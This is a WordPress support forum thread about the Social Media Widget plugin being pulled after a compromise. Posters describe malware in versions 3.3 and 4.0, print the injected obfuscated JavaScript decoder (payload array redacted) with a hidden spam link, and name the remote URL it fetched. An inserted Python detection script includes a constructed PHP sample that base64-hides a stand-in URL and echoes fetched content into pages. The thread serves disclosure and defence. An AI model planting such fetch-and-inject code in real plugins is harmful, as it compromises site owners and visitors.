• Resolved mvandemar

    (@mvandemar)


    I am rebuilding a client’s site that was hacked, and this is one of the plugins they were using. I went to grab a fresh copy and it looks like it was yanked from the repositories some time in the past week. Does anyone happen to know why? I can still access the most recent version via downloads.wordpress.org, but I don’t want to use it if it was pulled due to security concerns.

    Thanks.

    -Michael

    http://wordpress.org/extend/plugins/social-media-widget/

Viewing 15 replies - 1 through 15 (of 29 total)
  • Krishna

    (@1nexus)

    I think you posted a wrong link above. Try that. Which plugin out of the list there do you want to download?

    annoyingmouse

    (@annoyingmouse)

    Changelog of version 4.0.1 mentions removal of potentially malicious code.
    I don’t know why 4.0.1 is not visible through /extend/plugins but through /support/plugin, it is:

    http://wordpress.org/support/plugin/social-media-widget

    peter

    (@dewebbouwmeester)

    SMW 4.0 was infected. It retrieved the file contents of http://i.aaur.net/i.php which would inject the following into your pages, just after the widget:

    <script type="text/javascript">
    <!--//--><![CDATA[//><!--
    // Decoder: rebuilds each string in x[] from two-digit chunks of m, one
    // character per chunk (String.fromCharCode(parseInt(t)+25-l+a)), then
    // document.write()s a tag named x[0] (attribute x[4]) holding a CSS-looking
    // rule .x[2]{x[1]} -- presumably a style rule for the "nemonn" class that
    // keeps the injected link below out of sight. The array literal is redacted.
    function nemoViewState(){
    var a=0,m,v,t,z,x=new 
    
    redacted
    
    t=z='';
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
    //--><!]]>
    </script>
    <!-- the injected spam link itself, styled by the rule written above -->
    <p class="nemonn"><a href="http://paydaypam.co.uk/" title="Payday Loan">payday loans</a></p>

    Nemo is also discussed here: http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html.

    Version 4.0.1 of SMW does not retrieve http://i.aaur.net/i.php anymore and seems to be ok.

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    We forced an update to remove the discovered malware from already existing sites, however I highly recommend that you find another plugin.

    perezbox

    (@perezbox)

    Like Otto states, I would not recommend using that plugin any time soon. Even if the version has been updated to address the issue, it’s a big concern that it even made it into the core of the plugin at all. This tells you that there is a serious access problem for that dev.

    Thread Starter mvandemar

    (@mvandemar)

    @krishna – that is the correct link. I was discussing a plugin that had been taken down, seeing a “We couldn’t find that plugin.” message is expected in this case.

    Everyone else, thanks. When I grabbed the download using Google’s cache the version of the plugin I got was 3.3 (social-media-widget.3.3.zip). Were there any issues with that version?

    I just checked and I do not see the code referenced in it, so it is probably ok, but I will alert my client that they should probably switch. Thanks. 🙂

    -Michael

    brianfreytag

    (@brianfreytag)

    I just want to make it clear that I have not been the maintainer of Social Media Widget since January of 2013 (version 2.9.7).

    This post is to disassociate myself with this issue. I want the record to reflect that this issue arose months after I passed off the widget and have not had SVN access since signing over the widget in January. As the original creator of Social Media Widget and beginning its legacy, I want to remain clean of this in the case I decide to release a new WordPress plugin.

    I had a discussion with the current maintainer whom I transferred the rights over to – It seems that one of the freelancers that he hired to do some updates decided to go rogue or his password was cracked, though you will have to hear it from him for the full story.

    — Update – Changed the version I last pushed in the first paragraph

    Krishna

    (@1nexus)

    “I just checked and I do not see the code referenced in it, so it is probably ok”

    No, in view of what Otto stated above, I feel that you should not use the plugin and find another one in its place.

    annoyingmouse

    (@annoyingmouse)

    Hi Brian,

    I have a hard time believing what the current maintainer says. Several weeks ago, he was notified that something weird was going on in this thread: http://wordpress.org/support/topic/strange-url-in-social-widgetphp

    Since then, he didn’t investigate? He didn’t clean up? The code just got replaced by code that was not that easy to spot.

    Can’t you take ownership of the project again?

    peter

    (@dewebbouwmeester)

    Version 3.3 contained the malware already – but with some different code, accessing [ redacted, really you do not have to share malware links here ]

    You can get all versions of the plugin from svn ( http://plugins.svn.wordpress.org/social-media-widget )

    Version 4.0.1 is without the malicious code but like others say, best is obviously to remove this plugin altogether.
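
    Peter’s two observations above (the plugin fetched http://i.aaur.net/i.php and echoed the result into the page right after the widget, and every release is in SVN to compare) suggest a quick triage step for anyone holding old copies of a plugin: check each version’s PHP for calls that pull a hardcoded remote URL, including URLs hidden behind base64. The script below is an added example by the editor, not code from Social Media Widget or from WordPress.org. The two PHP sources inside it are constructed stand-ins (the hosts remote.example and cdn.example are made up), not the plugin’s real files, and the allow list of WordPress.org hosts is an assumption.

```python
"""Static triage for the behaviour described in this thread: plugin PHP that
fetches a hardcoded remote URL and echoes the result into the page.
Added example by the editor, not code from Social Media Widget or WordPress.org.
The two PHP sources below are constructed stand-ins, not the plugin's files."""
import base64
import os
import re
import tempfile

# Hosts a plugin may legitimately talk to (assumed list); anything else is reported.
DEFAULT_ALLOW = frozenset({"api.wordpress.org", "wordpress.org", "downloads.wordpress.org"})

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::\d+)?(?:/[^'\"\s]*)?")
_STR = r"['\"]([^'\"]*)['\"]"
# $var = 'literal'  or  $var = base64_decode('literal'), a common way to hide a URL
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*(?:@?base64_decode\s*\(\s*" + _STR + r"\s*\)|" + _STR + r")")
FETCHERS = ("file_get_contents", "fopen", "readfile", "curl_init", "wp_remote_get",
            "include_once", "include", "require_once", "require")
FETCH_RE = re.compile(r"\b(" + "|".join(FETCHERS) + r")\s*\(?\s*(\$\w+|['\"][^'\"]*['\"])")
CURL_RE = re.compile(r"CURLOPT_URL\s*,\s*(\$\w+|['\"][^'\"]*['\"])")


def _remote(value, allow):
    """Return value if it is an http(s) URL to a host outside the allow list, else None."""
    m = URL_RE.match(value)
    if not m or m.group(1).lower() in allow:
        return None
    return m.group(0)


def scan_php(src, path="<string>", allow=DEFAULT_ALLOW):
    """Return (path, lineno, kind, detail) for each fetch of a non-allowed remote URL.

    Variables assigned a remote URL, plain or base64-encoded, are tracked so that
    `$u = base64_decode('...'); echo file_get_contents($u);` is still reported.
    """
    findings = []
    tainted = {}  # "$var" -> remote URL it currently holds
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in ASSIGN_RE.finditer(line):
            var, b64, lit = m.group(1), m.group(2), m.group(3)
            if b64 is not None:
                try:
                    lit = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
                except ValueError:  # not valid base64; binascii.Error is a ValueError
                    continue
            url = _remote(lit, allow)
            if url:
                tainted[var] = url
                if b64 is not None:
                    findings.append((path, lineno, "obfuscated-url", f"{var} = base64({url})"))
        args = [m.group(2) for m in FETCH_RE.finditer(line)]
        args += [m.group(1) for m in CURL_RE.finditer(line)]
        for arg in args:
            url = tainted.get(arg) if arg.startswith("$") else _remote(arg.strip("'\""), allow)
            if url:
                findings.append((path, lineno, "remote-fetch", f"{arg} -> {url}"))
    return findings


def scan_plugin_dir(root, allow=DEFAULT_ALLOW):
    """Scan every .php file under root (e.g. an svn checkout of the plugin's tags/)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_php(fh.read(), os.path.relpath(full, root), allow))
    return findings


# Constructed samples. CLEAN_PHP only renders markup; INFECTED_PHP mirrors the pattern
# peter describes: render the widget, then fetch a remote file and echo it after it.
CLEAN_PHP = """<?php
function smw_render_widget($args) {
    $icons = 'http://cdn.example/icons.png';  // a URL in a string is not a fetch
    echo '<ul class="smw"><li><img src="' . esc_url($icons) . '"></li></ul>';
}
"""
INFECTED_PHP = """<?php
function smw_render_widget($args) {
    echo '<ul class="smw"><li>...</li></ul>';
    $u = base64_decode('aHR0cDovL3JlbW90ZS5leGFtcGxlL2kucGhw');  // http://remote.example/i.php
    echo @file_get_contents($u);
}
"""


def demo():
    """Lay the two samples out like tags/ in an svn checkout and scan the tree."""
    with tempfile.TemporaryDirectory() as root:
        for tag, src in (("sample-infected", INFECTED_PHP), ("sample-clean", CLEAN_PHP)):
            os.makedirs(os.path.join(root, "tags", tag))
            with open(os.path.join(root, "tags", tag, "social-media-widget.php"), "w") as fh:
                fh.write(src)
        return scan_plugin_dir(root)


if __name__ == "__main__":
    for finding in demo():
        print(*finding)
```

    Point scan_plugin_dir at a checkout of http://plugins.svn.wordpress.org/social-media-widget/tags to compare releases side by side; a remote-fetch hit on a host you do not recognise is the first thing to open. A regex pass like this only catches the straightforward cases (it misses URLs assembled by concatenation or chr() chains), so a clean result is a reason to diff the release further, not a clearance.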

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    We are working with the current maintainer of the plugin to ensure that everything is good, all problems are solved, all i’s dotted and all t’s crossed.

    In the meantime, the plugin will remain in its current state until all the issues can be resolved with it. Speculation is unnecessary at this time. Okay? Everybody just pause until we sort it out, thanks. 🙂

    brianfreytag

    (@brianfreytag)

    @annoyingmouse – I can’t really comment on anything beyond what was said in my post. I only posted it to keep my name clean – not to speculate on the outcome.

    I have every confidence in Otto and his team to get this issue resolved the way it has to be resolved.

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    The issue has been resolved and the plugin has been made available once again.

    Otto, you forced an update onto sites to remove the malware from them? Without the admins clicking upgrade? How do you go about doing that?

    perezbox

    (@perezbox)

    Hi Otto

    I’m having a very hard time with your latest insight.

    What insight can you provide that will help reassure plugin users that this has in fact been resolved? Speaking of which, what exactly was resolved?

    I have a hard time understanding how this is being allowed back in the repo, maybe you have all the answers you need, but allowing it back in the repo essentially tells people it’s good to go and you’re putting your name behind it as the approver. This is a pretty blatant abuse of trust by the author, and not much has been said from them on how it happened and how it has been addressed.

    Tony

  • The topic ‘Anyone know why Social Media Widget was removed?’ is closed to new replies.